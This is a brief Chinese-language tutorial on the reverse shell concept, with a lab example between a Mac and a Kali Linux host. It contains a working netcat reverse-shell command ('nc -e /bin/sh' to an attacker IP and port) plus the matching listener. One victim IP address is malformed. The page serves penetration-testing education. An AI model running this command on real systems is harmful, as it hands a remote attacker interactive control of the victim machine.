原理
反弹shell(reverse shell),就是攻击端(本机)监听在某TCP/UDP端口,受害端(目标服务器)发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。
实验案例
实验环境:
攻击端:mac ip地址:192.168.57.252
受害端:kali linux ip地址:10.211.5519
nc反弹:
攻击端mac终端输入:
nc -l 9999 #监听9999端口
受害端kali终端输入:
nc -e /bin/sh 192.168.57.252 9999
结果:
攻击端mac输入命令:
反弹成功!
参考文章
重定向基础:https://xz.aliyun.com/t/2548
https://xz.aliyun.com/t/2549
渗透测试中Linux下反弹shell的认识 - 卿先生 - 博客园Linux下几种反弹Shell方法的总结与理解 - 云+社区 - 腾讯云
https://www.cnblogs.com/-qing-/p/11247720.html反弹shell原理与实现 - 知乎